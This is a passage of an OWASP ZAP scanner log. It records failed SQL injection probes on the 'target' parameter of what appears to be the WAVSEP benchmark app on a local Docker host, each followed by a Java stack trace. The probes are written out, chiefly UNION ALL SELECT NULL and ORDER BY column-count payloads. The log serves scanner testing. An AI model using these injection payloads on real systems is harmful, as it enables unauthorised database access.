org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680839 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6236-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6236-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680840 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680841 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680841 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 4888-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 4888-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680843 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680843 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680844 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680845 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680846 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680847 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680847 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680848 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 